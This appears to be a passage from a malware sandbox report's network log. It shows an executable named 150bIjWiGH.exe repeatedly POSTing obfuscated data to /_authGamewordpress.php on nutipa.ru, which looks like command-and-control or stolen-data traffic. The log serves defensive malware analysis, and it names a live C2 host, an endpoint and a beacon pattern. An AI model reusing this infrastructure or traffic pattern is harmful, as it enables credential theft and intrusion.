                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0RA3vNo7tuvztVPy6rKelsBqCCrMfXYo9oO46gbh4HlZ29eCHRUEC1A%2FIN96mzFG5Q6PP%2BJjKylThsAd2Db8AxE3UXuUGDzfvz5q5AVviLyk638lIjbEwDPPfM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b8d384042a5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3670&min_rtt=1727&rtt_var=4534&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=84520&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            51 | 192.168.2.4 | 49815 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:29.213779926 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:29.560817003 CET | 2536 | OUT | Data Raw: 55 55 46 5c 5f 5f 58 57 5d 5a 56 51 50 5c 57 56 55 56 5e 48 5a 55 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUF\__XW]ZVQP\WVUV^HZU[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$?)=*"@(>07$\%.:\1>>0,3X5(#!V/.F'#P 7
                                                            Dec 15, 2024 19:37:30.306015968 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:30.566747904 CET | 795 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Slev0DmFUZL3SbQWf649KsRPc517%2BifvSApzIAzi8GoeDZV4pSsg1WEbg4EONK0mqdtTDynH%2BK9XbHJGo0ukadtjVRn6D%2Bh0t3HkNGvM2s4IEcFYZpj0pV83h8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b977f2e43af-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9152&min_rtt=2483&rtt_var=14269&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=26148&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            52 | 192.168.2.4 | 49816 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:30.810620070 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:31.169913054 CET | 2536 | OUT | Data Raw: 50 52 46 5d 5f 57 5d 53 5d 5a 56 51 50 5b 57 50 55 51 5e 41 5a 52 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRF]_W]S]ZVQP[WPUQ^AZR[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]([=\8"!+-Z!<4Y2-2&9T>3[$X&(3%,+.F'#P +
                                                            Dec 15, 2024 19:37:31.904314995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:32.139972925 CET | 794 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XgQed0PSrKLlpjSy%2F5Xt4wgKm5RZEMcUtQymzOjPxGy08UFY%2FpzxRlBd%2FchnGJLC2HZLN3S6DZvJ2mwyPRRp1W5O5hnDgMOYZfdIIqMkNN3gAbxK6Y1iGYr2A0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ba17826c431-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3673&min_rtt=1564&rtt_var=4806&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=79162&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            53 | 192.168.2.4 | 49817 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:30.920572996 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:31.279267073 CET | 1420 | OUT | Data Raw: 50 55 43 5b 5f 5c 58 5e 5d 5a 56 51 50 5d 57 50 55 52 5e 46 5a 56 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PUC[_\X^]ZVQP]WPUR^FZV[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(=1=946!(+]#Y(1>&.=V*U/'>]+5U,+.F'#P 3
                                                            Dec 15, 2024 19:37:32.007447004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:32.248759031 CET | 951 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2jSVv%2Flh17uR2%2FP1PTwYWCru%2BZ2xyOE9Kpnfuf%2B9XtdSx9jRTa6%2FjoovzB4CEP1qH0AIdy9GeCuACSj2vAVywydNWYz6jgFby%2FyzC%2FBGaKyHF7s84TS2vR7Asec%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ba21c9a8c0b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4868&min_rtt=1972&rtt_var=6532&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=58063&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5c 22 3a 26 1d 20 00 2f 08 2c 2f 32 0b 29 30 3c 41 26 32 3e 03 27 2b 3b 58 29 5b 3c 0e 31 29 22 07 20 0c 31 57 3c 37 21 5d 31 26 21 51 03 11 21 00 26 10 2b 01 2b 39 3f 05 26 1f 34 03 25 3d 0a 59 2b 28 26 55 30 16 09 56 22 3e 09 0e 2d 14 23 05 28 04 3f 19 3a 2e 31 0c 20 1c 2e 53 0c 17 25 1e 3c 07 00 13 20 32 31 55 24 02 33 57 23 5f 3d 0c 3d 0a 3c 54 30 0a 38 0e 30 3e 12 1a 21 30 22 0e 32 14 0c 5a 37 0b 32 54 3e 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989\":& /,/2)0<A&2>'+;X)[<1)" 1W<7!]1&!Q!&++9?&4%=Y+(&U0V">-#(?:.1 .S%< 21U$3W#_==<T080>!0"2Z72T>%\ .R4]T0
                                                            Dec 15, 2024 19:37:32.262188911 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:32.580823898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:32.581069946 CET | 2536 | OUT | Data Raw: 50 53 46 58 5a 5c 5d 56 5d 5a 56 51 50 5f 57 57 55 50 5e 40 5a 50 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PSFXZ\]V]ZVQP_WWUP^@ZP[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<.&Y>#Y"/&C+.$#%."'=9(33=&=#1W,.F'#P
                                                            Dec 15, 2024 19:37:33.059726954 CET | 799 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUNexAzmcziyI6ZwpyhamSi7exsY8We8tICVQopc%2FU2VhuFwyCdjxYMI4i7l73uDszh%2Bh64EnMMZ2AlqaeMnJqys2KjvOhoUVwZfb75sjPK%2FGrpio7dGqA0pBeI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ba5affc8c0b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6162&min_rtt=1901&rtt_var=7530&sent=7&recv=11&lost=0&retrans=0&sent_bytes=1001&recv_bytes=4548&delivery_rate=1482986&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            54 | 192.168.2.4 | 49818 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:33.412204027 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:33.763674974 CET | 2536 | OUT | Data Raw: 55 55 43 5f 5a 5b 5d 51 5d 5a 56 51 50 5a 57 54 55 56 5e 46 5a 55 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUC_Z[]Q]ZVQPZWTUV^FZU[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^<=?:6/6<.3!?#&==&**0$=<#V8.F'#P /
                                                            Dec 15, 2024 19:37:34.493545055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:34.835812092 CET | 792 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lMYqjzaNmwybRoP43%2FiAzQUa5GQdqbLN8DkjxTG2jIB0sYiDXnxwyU58l5d9RdrXI5RagdiALcEGrDAoPV5eXbbvjfjpdRxi6jwDMGktv4H2JcLYbRaJa%2BIndkU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bb1afc541cd-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4453&min_rtt=1788&rtt_var=6001&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=63167&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            55 | 192.168.2.4 | 49819 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:35.084913969 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:35.435619116 CET | 2536 | OUT | Data Raw: 50 56 43 50 5f 5d 5d 54 5d 5a 56 51 50 5d 57 51 55 5d 5e 49 5a 57 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVCP_]]T]ZVQP]WQU]^IZW[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<*'Y6&B(.+X4,+'.%'>%P>U;'>"<U*/+.F'#P 3
                                                            Dec 15, 2024 19:37:36.172308922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:36.433260918 CET | 796 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21I1PNrLfOAH%2FrtsO8XHwS9G6AKW3ABQ5xdUiV%2BJbXP6w0fOUdVlIpa6hKauZlDvHRMjpBb%2BFoGRWRvIEWWvAC4eR9AERdgmDkLIi%2BfxkpH9NPcExZcfIw4bHmM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bbc1c9132f4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3834&min_rtt=2017&rtt_var=4391&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=88180&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            56 | 192.168.2.4 | 49820 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:36.682832003 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:37.029277086 CET | 2536 | OUT | Data Raw: 50 52 46 5c 5a 5a 58 51 5d 5a 56 51 50 5d 57 54 55 51 5e 44 5a 57 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRF\ZZXQ]ZVQP]WTUQ^DZW[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_).1)[5<=?=44$]&-&&>=W(0#$X&<&,.F'#P 3
                                                            Dec 15, 2024 19:37:37.808613062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:38.044013977 CET | 798 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6CvO4x4OSf6o8%2BqTYA4XGzaRcd%2FhQd5lEmhWdux%2F5ts3mfaTrqpP31Uv1%2FHedPGPw73xhxviByLPpb46%2BiJoBcVGiJa34rbBGOOOY40dBiEXgAjKIFBnliFSyE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bc65fa59e02-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4316&min_rtt=1942&rtt_var=5477&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=69729&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            57 | 192.168.2.4 | 49821 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:37.386253119 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1404
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:37.732522011 CET | 1404 | OUT | Data Raw: 55 54 46 5d 5f 5a 58 5e 5d 5a 56 51 50 58 57 50 55 5d 5e 42 5a 51 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UTF]_ZX^]ZVQPXWPU]^BZQ[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_?==\7[",*E?8#/%*^1X:=0 3=%<0)T/+.F'#P +
                                                            Dec 15, 2024 19:37:38.479573011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:38.712125063 CET | 946 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EPrXDDCnCFPyu7utgctFSKwmu7j%2FiFfJsStsXwcYcnd01Ur1i6JlefzECtLpUODFpNy%2BkXnspFuK6yhntuLPK%2BJdR3YvlAFC8wz5be1sUw3OPj3LLU%2Fd7SvNPc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bca8e670ca0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2973&min_rtt=1668&rtt_var=3235&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1724&delivery_rate=120581&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 10 23 29 3a 1d 37 00 3f 09 2c 3f 3d 50 2b 0e 3f 1c 30 32 31 13 33 06 3b 5d 3e 13 2f 1c 26 39 08 06 34 32 2e 09 3f 27 0f 59 32 36 21 51 03 11 22 1d 26 2e 02 12 2a 2a 28 17 25 21 05 5a 25 2d 0e 5c 3f 38 08 1e 27 3b 3f 55 22 3d 37 0e 3a 3a 3b 03 2b 14 23 5c 3a 3e 32 1c 34 0c 2e 53 0c 17 25 5d 3c 29 2e 1c 21 32 35 56 30 3f 2b 1e 37 39 32 1e 3d 1d 23 0f 24 33 09 10 24 10 38 52 35 30 35 53 31 2a 21 02 34 21 22 1c 3d 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989#):7?,?=P+?0213;]>/&942.?'Y26!Q"&.**(%!Z%-\?8';?U"=7::;+#\:>24.S%]<).!25V0?+792=#$3$8R505S1*!4!"=%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            58 | 192.168.2.4 | 49822 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:38.288415909 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:38.638660908 CET | 2536 | OUT | Data Raw: 50 53 43 59 5f 56 58 56 5d 5a 56 51 50 5f 57 57 55 52 5e 45 5a 56 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PSCY_VXV]ZVQP_WWUR^EZV[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z(>>Z>[5Z&E+-34;&>22(3['+3=;.F'#P
                                                            Dec 15, 2024 19:37:39.385776043 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:39.619956970 CET | 801 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sYlod%2BUXDOPBkI9uj55RvGtkahbFPnml2VOvorjDYLx%2Fk2YGgr0m4Tcdxid7bnZ0qYZtn%2Fr5BpOYV6EbdI%2Fq%2FhOaQ5NUwGzO0XMOAUNLXQvU3IXDD5uThkRNvJY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288bd03e6642af-EWR
                                                            alt-svc: h3=":443"; ma=86400
